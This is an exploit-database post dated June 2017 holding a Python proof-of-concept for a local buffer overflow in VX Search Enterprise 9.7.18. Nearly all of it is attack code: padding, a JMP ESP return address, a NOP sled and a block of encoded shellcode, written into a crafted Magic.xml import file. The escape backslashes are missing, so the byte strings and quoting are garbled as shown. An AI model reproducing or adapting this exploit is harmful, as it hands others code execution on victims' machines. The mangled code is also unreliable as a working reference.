VX Search Enterprise 9.7.18 Local Buffer Overflow
Posted on 16 June 2017
import os import struct author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln. # Date: 2017.06.15 # Exploit Author: Greg Priest # Version: VX Search Enterprise v9.7.18 # Tested on: Windows7 x64 HUN/ENG Professional ''' overflow = "A" * 1536 jmp_esp = "x4Ex21x1Fx65" #"x94x21x1Cx65" shortjump = "xEBx55" shellcode3= ("xbex7ax1fx2dx97xdaxd5xd9x74x24xf4x5ax33xc9xb1" "x30x83xc2x04x31x72x0fx03x72x75xfdxd8x6bx61x83" "x23x94x71xe4xaax71x40x24xc8xf2xf2x94x9ax57xfe" "x5fxcex43x75x2dxc7x64x3ex98x31x4axbfxb1x02xcd" "x43xc8x56x2dx7ax03xabx2cxbbx7ex46x7cx14xf4xf5" "x91x11x40xc6x1ax69x44x4exfex39x67x7fx51x32x3e" "x5fx53x97x4axd6x4bxf4x77xa0xe0xcex0cx33x21x1f" "xecx98x0cx90x1fxe0x49x16xc0x97xa3x65x7dxa0x77" "x14x59x25x6cxbex2ax9dx48x3fxfex78x1ax33x4bx0e" "x44x57x4axc3xfex63xc7xe2xd0xe2x93xc0xf4xafx40" "x68xacx15x26x95xaexf6x97x33xa4x1axc3x49xe7x70" "x12xdfx9dx36x14xdfx9dx66x7dxeex16xe9xfaxefxfc" "x4exf4xa5x5dxe6x9dx63x34xbbxc3x93xe2xffxfdx17" "x07x7fxfax08x62x7ax46x8fx9exf6xd7x7axa1xa5xd8" "xaexc2x28x4bx32x05") crash = overflow+jmp_esp+"x90"*24+shortjump+"x90"*76+"x90" * 58+shellcode3 evil = '<?xml version="1.0" encoding="UTF-8"?> <classify name='' + crash + ' </classify>' exploit = open('Magic.xml', 'w') exploit.write(evil) exploit.close() print "Magic.xml raedy!"